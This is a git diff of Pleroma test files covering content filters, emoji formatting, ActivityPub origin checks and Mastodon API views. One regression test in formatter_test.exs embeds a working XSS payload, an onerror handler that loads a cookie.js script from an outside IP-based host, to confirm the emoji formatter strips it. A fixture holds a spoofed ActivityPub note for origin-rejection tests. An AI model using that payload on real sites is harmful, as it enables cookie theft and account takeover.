11 files changed, 410 insertions, 6 deletions

diff --git a/test/filter_test.exs b/test/filter_test.exs
new file mode 100644
index 000000000..d81c92f08
--- /dev/null
+++ b/test/filter_test.exs
@@ -0,0 +1,85 @@
+defmodule Pleroma.FilterTest do
+  alias Pleroma.{User, Repo}
+  use Pleroma.DataCase
+
+  import Pleroma.Factory
+  import Ecto.Query
+
+  test "creating a filter" do
+    user = insert(:user)
+
+    query = %Pleroma.Filter{
+      user_id: user.id,
+      filter_id: 42,
+      phrase: "knights",
+      context: ["home"]
+    }
+
+    {:ok, %Pleroma.Filter{} = filter} = Pleroma.Filter.create(query)
+    result = Pleroma.Filter.get(filter.filter_id, user)
+    assert query.phrase == result.phrase
+  end
+
+  test "deleting a filter" do
+    user = insert(:user)
+
+    query = %Pleroma.Filter{
+      user_id: user.id,
+      filter_id: 0,
+      phrase: "knights",
+      context: ["home"]
+    }
+
+    {:ok, filter} = Pleroma.Filter.create(query)
+    {:ok, filter} = Pleroma.Filter.delete(query)
+    assert is_nil(Repo.get(Pleroma.Filter, filter.filter_id))
+  end
+
+  test "getting all filters by an user" do
+    user = insert(:user)
+
+    query_one = %Pleroma.Filter{
+      user_id: user.id,
+      filter_id: 1,
+      phrase: "knights",
+      context: ["home"]
+    }
+
+    query_two = %Pleroma.Filter{
+      user_id: user.id,
+      filter_id: 2,
+      phrase: "who",
+      context: ["home"]
+    }
+
+    {:ok, filter_one} = Pleroma.Filter.create(query_one)
+    {:ok, filter_two} = Pleroma.Filter.create(query_two)
+    filters = Pleroma.Filter.get_filters(user)
+    assert filter_one in filters
+    assert filter_two in filters
+  end
+
+  test "updating a filter" do
+    user = insert(:user)
+
+    query_one = %Pleroma.Filter{
+      user_id: user.id,
+      filter_id: 1,
+      phrase: "knights",
+      context: ["home"]
+    }
+
+    query_two = %Pleroma.Filter{
+      user_id: user.id,
+      filter_id: 1,
+      phrase: "who",
+      context: ["home", "timeline"]
+    }
+
+    {:ok, filter_one} = Pleroma.Filter.create(query_one)
+    {:ok, filter_two} = Pleroma.Filter.update(query_two)
+    assert filter_one != filter_two
+    assert filter_two.phrase == query_two.phrase
+    assert filter_two.context == query_two.context
+  end
+end
diff --git a/test/fixtures/httpoison_mock/https__info.pleroma.site_activity.json b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity.json
new file mode 100644
index 000000000..eab0341fe
--- /dev/null
+++ b/test/fixtures/httpoison_mock/https__info.pleroma.site_activity.json
@@ -0,0 +1,14 @@
+{
+        "@context": "https://www.w3.org/ns/activitystreams",
+        "actor": "https://mastodon.example.org/users/admin",
+        "attachment": [],
+        "attributedTo": "https://mastodon.example.org/users/admin",
+        "content": "<p>this post was not actually written by Haelwenn</p>",
+        "id": "https://info.pleroma.site/activity.json",
+        "published": "2018-09-01T22:15:00Z",
+        "tag": [],
+        "to": [
+            "https://www.w3.org/ns/activitystreams#Public"
+        ],
+        "type": "Note"
+}
diff --git a/test/formatter_test.exs b/test/formatter_test.exs
index 95558089b..273eefb8a 100644
--- a/test/formatter_test.exs
+++ b/test/formatter_test.exs
@@ -189,14 +189,39 @@ defmodule Pleroma.FormatterTest do
     text = "I love :moominmamma:"
 
     expected_result =
-      "I love <img height='32px' width='32px' alt='moominmamma' title='moominmamma' src='/finmoji/128px/moominmamma-128.png' />"
+      "I love <img height=\"32px\" width=\"32px\" alt=\"moominmamma\" title=\"moominmamma\" src=\"/finmoji/128px/moominmamma-128.png\" />"
 
     assert Formatter.emojify(text) == expected_result
   end
 
+  test "it does not add XSS emoji" do
+    text =
+      "I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):"
+
+    custom_emoji = %{
+      "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" =>
+        "https://placehold.it/1x1"
+    }
+
+    expected_result =
+      "I love <img height=\"32px\" width=\"32px\" alt=\"\" title=\"\" src=\"https://placehold.it/1x1\" />"
+
+    assert Formatter.emojify(text, custom_emoji) == expected_result
+  end
+
   test "it returns the emoji used in the text" do
     text = "I love :moominmamma:"
 
     assert Formatter.get_emoji(text) == [{"moominmamma", "/finmoji/128px/moominmamma-128.png"}]
   end
+
+  test "it returns a nice empty result when no emojis are present" do
+    text = "I love moominamma"
+    assert Formatter.get_emoji(text) == []
+  end
+
+  test "it doesn't die when text is absent" do
+    text = nil
+    assert Formatter.get_emoji(text) == []
+  end
 end
diff --git a/test/support/httpoison_mock.ex b/test/support/httpoison_mock.ex
index 4ee2feb95..7057f30fb 100644
--- a/test/support/httpoison_mock.ex
+++ b/test/support/httpoison_mock.ex
@@ -3,6 +3,14 @@ defmodule HTTPoisonMock do
 
   def get(url, body \\ [], headers \\ [])
 
+  def get("https://info.pleroma.site/activity.json", _, _) do
+    {:ok,
+     %Response{
+       status_code: 200,
+       body: File.read!("test/fixtures/httpoison_mock/https__info.pleroma.site_activity.json")
+     }}
+  end
+
   def get("https://puckipedia.com/", [Accept: "application/activity+json"], _) do
     {:ok,
      %Response{
diff --git a/test/web/activity_pub/transmogrifier_test.exs b/test/web/activity_pub/transmogrifier_test.exs
index e2926d495..afa25bb60 100644
--- a/test/web/activity_pub/transmogrifier_test.exs
+++ b/test/web/activity_pub/transmogrifier_test.exs
@@ -798,4 +798,25 @@ defmodule Pleroma.Web.ActivityPub.TransmogrifierTest do
       assert rewritten["url"] == "http://example.com"
     end
   end
+
+  describe "actor origin containment" do
+    test "it rejects objects with a bogus origin" do
+      {:error, _} = ActivityPub.fetch_object_from_id("https://info.pleroma.site/activity.json")
+    end
+
+    test "it rejects activities which reference objects with bogus origins" do
+      user = insert(:user, %{local: false})
+
+      data = %{
+        "@context" => "https://www.w3.org/ns/activitystreams",
+        "id" => user.ap_id <> "/activities/1234",
+        "actor" => user.ap_id,
+        "to" => ["https://www.w3.org/ns/activitystreams#Public"],
+        "object" => "https://info.pleroma.site/activity.json",
+        "type" => "Announce"
+      }
+
+      :error = Transmogrifier.handle_incoming(data)
+    end
+  end
 end
diff --git a/test/web/mastodon_api/account_view_test.exs b/test/web/mastodon_api/account_view_test.exs
index 35c8a1fb0..e1e07fbcd 100644
--- a/test/web/mastodon_api/account_view_test.exs
+++ b/test/web/mastodon_api/account_view_test.exs
@@ -49,10 +49,48 @@ defmodule Pleroma.Web.MastodonAPI.AccountViewTest do
         }
       ],
       fields: [],
+      bot: false,
       source: %{
         note: "",
         privacy: "public",
-        sensitive: "false"
+        sensitive: false
+      }
+    }
+
+    assert expected == AccountView.render("account.json", %{user: user})
+  end
+
+  test "Represent a Service(bot) account" do
+    user =
+      insert(:user, %{
+        info: %{"note_count" => 5, "follower_count" => 3, "source_data" => %{"type" => "Service"}},
+        nickname: "shp@shitposter.club",
+        inserted_at: ~N[2017-08-15 15:47:06.597036]
+      })
+
+    expected = %{
+      id: to_string(user.id),
+      username: "shp",
+      acct: user.nickname,
+      display_name: user.name,
+      locked: false,
+      created_at: "2017-08-15T15:47:06.000Z",
+      followers_count: 3,
+      following_count: 0,
+      statuses_count: 5,
+      note: user.bio,
+      url: user.ap_id,
+      avatar: "http://localhost:4001/images/avi.png",
+      avatar_static: "http://localhost:4001/images/avi.png",
+      header: "http://localhost:4001/images/banner.png",
+      header_static: "http://localhost:4001/images/banner.png",
+      emojis: [],
+      fields: [],
+      bot: true,
+      source: %{
+        note: "",
+        privacy: "public",
+        sensitive: false
       }
     }
 
@@ -85,8 +123,10 @@ defmodule Pleroma.Web.MastodonAPI.AccountViewTest do
       followed_by: false,
       blocking: true,
       muting: false,
+      muting_notifications: false,
       requested: false,
-      domain_blocking: false
+      domain_blocking: false,
+      showing_reblogs: false
     }
 
     assert expected == AccountView.render("relationship.json", %{user: user, target: other_user})
diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs
index 9e33c1d04..e9deae64d 100644
--- a/test/web/mastodon_api/mastodon_api_controller_test.exs
+++ b/test/web/mastodon_api/mastodon_api_controller_test.exs
@@ -206,7 +206,19 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do
       |> assign(:user, user)
       |> get("/api/v1/accounts/verify_credentials")
 
-    assert %{"id" => id} = json_response(conn, 200)
+    assert %{"id" => id, "source" => %{"privacy" => "public"}} = json_response(conn, 200)
+    assert id == to_string(user.id)
+  end
+
+  test "verify_credentials default scope unlisted", %{conn: conn} do
+    user = insert(:user, %{info: %{"default_scope" => "unlisted"}})
+
+    conn =
+      conn
+      |> assign(:user, user)
+      |> get("/api/v1/accounts/verify_credentials")
+
+    assert %{"id" => id, "source" => %{"privacy" => "unlisted"}} = json_response(conn, 200)
     assert id == to_string(user.id)
   end
 
@@ -251,6 +263,125 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do
     end
   end
 
+  describe "filters" do
+    test "creating a filter", %{conn: conn} do
+      user = insert(:user)
+
+      filter = %Pleroma.Filter{
+        phrase: "knights",
+        context: ["home"]
+      }
+
+      conn =
+        conn
+        |> assign(:user, user)
+        |> post("/api/v1/filters", %{"phrase" => filter.phrase, context: filter.context})
+
+      assert response = json_response(conn, 200)
+      assert response["phrase"] == filter.phrase
+      assert response["context"] == filter.context
+    end
+
+    test "fetching a list of filters", %{conn: conn} do
+      user = insert(:user)
+
+      query_one = %Pleroma.Filter{
+        user_id: user.id,
+        filter_id: 1,
+        phrase: "knights",
+        context: ["home"]
+      }
+
+      query_two = %Pleroma.Filter{
+        user_id: user.id,
+        filter_id: 2,
+        phrase: "who",
+        context: ["home"]
+      }
+
+      {:ok, filter_one} = Pleroma.Filter.create(query_one)
+      {:ok, filter_two} = Pleroma.Filter.create(query_two)
+
+      conn =
+        conn
+        |> assign(:user, user)
+        |> get("/api/v1/filters")
+
+      assert response = json_response(conn, 200)
+    end
+
+    test "get a filter", %{conn: conn} do
+      user = insert(:user)
+
+      query = %Pleroma.Filter{
+        user_id: user.id,
+        filter_id: 2,
+        phrase: "knight",
+        context: ["home"]
+      }
+
+      {:ok, filter} = Pleroma.Filter.create(query)
+
+      conn =
+        conn
+        |> assign(:user, user)
+        |> get("/api/v1/filters/#{filter.filter_id}")
+
+      assert response = json_response(conn, 200)
+    end
+
+    test "update a filter", %{conn: conn} do
+      user = insert(:user)
+
+      query = %Pleroma.Filter{
+        user_id: user.id,
+        filter_id: 2,
+        phrase: "knight",
+        context: ["home"]
+      }
+
+      {:ok, filter} = Pleroma.Filter.create(query)
+
+      new = %Pleroma.Filter{
+        phrase: "nii",
+        context: ["home"]
+      }
+
+      conn =
+        conn
+        |> assign(:user, user)
+        |> put("/api/v1/filters/#{query.filter_id}", %{
+          phrase: new.phrase,
+          context: new.context
+        })
+
+      assert response = json_response(conn, 200)
+      assert response["phrase"] == new.phrase
+      assert response["context"] == new.context
+    end
+
+    test "delete a filter", %{conn: conn} do
+      user = insert(:user)
+
+      query = %Pleroma.Filter{
+        user_id: user.id,
+        filter_id: 2,
+        phrase: "knight",
+        context: ["home"]
+      }
+
+      {:ok, filter} = Pleroma.Filter.create(query)
+
+      conn =
+        conn
+        |> assign(:user, user)
+        |> delete("/api/v1/filters/#{filter.filter_id}")
+
+      assert response = json_response(conn, 200)
+      assert response == %{}
+    end
+  end
+
   describe "lists" do
     test "creating a list", %{conn: conn} do
       user = insert(:user)
@@ -368,6 +499,30 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do
 
       assert id == to_string(activity_two.id)
     end
+
+    test "list timeline does not leak non-public statuses for unfollowed users", %{conn: conn} do
+      user = insert(:user)
+      other_user = insert(:user)
+      {:ok, activity_one} = TwitterAPI.create_status(other_user, %{"status" => "Marisa is cute."})
+
+      {:ok, activity_two} =
+        TwitterAPI.create_status(other_user, %{
+          "status" => "Marisa is cute.",
+          "visibility" => "private"
+        })
+
+      {:ok, list} = Pleroma.List.create("name", user)
+      {:ok, list} = Pleroma.List.follow(list, other_user)
+
+      conn =
+        conn
+        |> assign(:user, user)
+        |> get("/api/v1/timelines/list/#{list.id}")
+
+      assert [%{"id" => id}] = json_response(conn, 200)
+
+      assert id == to_string(activity_one.id)
+    end
   end
 
   describe "notifications" do
@@ -691,6 +846,18 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do
       assert User.following?(other_user, user) == true
     end
 
+    test "verify_credentials", %{conn: conn} do
+      user = insert(:user, %{info: %{"default_scope" => "private"}})
+
+      conn =
+        conn
+        |> assign(:user, user)
+        |> get("/api/v1/accounts/verify_credentials")
+
+      assert %{"id" => id, "source" => %{"privacy" => "private"}} = json_response(conn, 200)
+      assert id == to_string(user.id)
+    end
+
     test "/api/v1/follow_requests/:id/reject works" do
       user = insert(:user, %{info: %{"locked" => true}})
       other_user = insert(:user)
diff --git a/test/web/node_info_test.exs b/test/web/node_info_test.exs
new file mode 100644
index 000000000..d48f40e47
--- /dev/null
+++ b/test/web/node_info_test.exs
@@ -0,0 +1,17 @@
+defmodule Pleroma.Web.NodeInfoTest do
+  use Pleroma.Web.ConnCase
+
+  import Pleroma.Factory
+
+  test "nodeinfo shows staff accounts", %{conn: conn} do
+    user = insert(:user, %{local: true, info: %{"is_moderator" => true}})
+
+    conn =
+      conn
+      |> get("/nodeinfo/2.0.json")
+
+    assert result = json_response(conn, 200)
+
+    assert user.ap_id in result["metadata"]["staffAccounts"]
+  end
+end
diff --git a/test/web/twitter_api/representers/activity_representer_test.exs b/test/web/twitter_api/representers/activity_representer_test.exs
index 3f85e028b..894d20049 100644
--- a/test/web/twitter_api/representers/activity_representer_test.exs
+++ b/test/web/twitter_api/representers/activity_representer_test.exs
@@ -126,7 +126,7 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ActivityRepresenterTest do
     }
 
     expected_html =
-      "<p>2hu</p>alert('YAY')Some <img height='32px' width='32px' alt='2hu' title='2hu' src='corndog.png' /> content mentioning <a href=\"#{
+      "<p>2hu</p>alert('YAY')Some <img height=\"32px\" width=\"32px\" alt=\"2hu\" title=\"2hu\" src=\"corndog.png\" /> content mentioning <a href=\"#{
         mentioned_user.ap_id
       }\">@shp</a>"
 
diff --git a/test/web/twitter_api/views/activity_view_test.exs b/test/web/twitter_api/views/activity_view_test.exs
index a101e4ae8..b9a8efdad 100644
--- a/test/web/twitter_api/views/activity_view_test.exs
+++ b/test/web/twitter_api/views/activity_view_test.exs
@@ -126,6 +126,33 @@ defmodule Pleroma.Web.TwitterAPI.ActivityViewTest do
     assert result == expected
   end
 
+  test "a like activity for deleted post" do
+    user = insert(:user)
+    other_user = insert(:user, %{nickname: "shp"})
+
+    {:ok, activity} = CommonAPI.post(user, %{"status" => "Hey @shp!"})
+    {:ok, like, _object} = CommonAPI.favorite(activity.id, other_user)
+    CommonAPI.delete(activity.id, user)
+
+    result = ActivityView.render("activity.json", activity: like)
+
+    expected = %{
+      "activity_type" => "like",
+      "created_at" => like.data["published"] |> Utils.date_to_asctime(),
+      "external_url" => like.data["id"],
+      "id" => like.id,
+      "in_reply_to_status_id" => nil,
+      "is_local" => true,
+      "is_post_verb" => false,
+      "statusnet_html" => "shp favorited a status.",
+      "text" => "shp favorited a status.",
+      "uri" => "tag:#{like.data["id"]}:objectType=Favourite",
+      "user" => UserView.render("show.json", user: other_user)
+    }
+
+    assert result == expected
+  end
+
   test "an announce activity" do
     user = insert(:user)
     other_user = insert(:user, %{nickname: "shp"})
diff --git a/test/web/twitter_api/views/user_view_test.exs b/test/web/twitter_api/views/user_view_test.exs
index 24a5c5bca..7075a2370 100644
--- a/test/web/twitter_api/views/user_view_test.exs
+++ b/test/web/twitter_api/views/user_view_test.exs
@@ -22,7 +22,7 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do
 
   test "A user with emoji in username", %{user: user} do
     expected =
-      "<img height='32px' width='32px' alt='karjalanpiirakka' title='karjalanpiirakka' src='/file.png' /> man"
+      "<img height=\"32px\" width=\"32px\" alt=\"karjalanpiirakka\" title=\"karjalanpiirakka\" src=\"/file.png\" /> man"
 
     user = %{
       user